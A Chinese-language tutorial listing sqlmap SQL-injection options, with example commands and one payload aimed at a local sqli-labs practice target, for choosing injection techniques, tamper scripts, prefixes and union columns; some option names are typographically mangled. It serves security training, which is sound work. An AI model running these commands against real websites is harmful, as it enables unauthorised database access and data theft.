注入工具 -- sqlmap(注入参数)

任何关系走到最后，不过相识一场，有心者有所累，无心者无所谓，情出自愿，事过无悔，不负遇见，不谈亏欠。。。

一、指定数据库类型 --dbms

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs

二、指定操作系统 --os

http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs

三、解决编码问题

将所有结果转换为字符串，并用空格替换NULL结果 --no-cast

四、关闭字符串转义机制

–no-escape

五、设置无效值替换

–invalid-bignum 大整数替换

–invalid-logical 布尔操作替换

–invalid-string 随机字符串替换

六、自定义注入负载位置

–prefix 设置前缀

–suffix 设置后缀

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --prefix="’)" --suffix=“and (‘abc’='abc” --dbs

payload:id=(‘1’) and (‘abc’=‘abc’)

七、设置tamper脚本

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --tamper “least.py,varnish.py” --dbs

八、设置dbms认证

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbms-cred=“root:root” --dbs

九、设置具体sql注入技术

–technique B 布尔盲注

–technique E 报错注入

–technique U union查询注入

–technique S 堆叠注入

–technique T 时间盲注

–technique Q 内联查询注入

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --technique T --time-sec 3 --dbs

–time -sec 时间盲注时间为3

十、指定union字段数

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-cols 12-18 --dbs

十一、指定union字符，默认是null

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-char aaa --dbs

禁止非法，后果自负

欢迎关注公众号：web安全工具库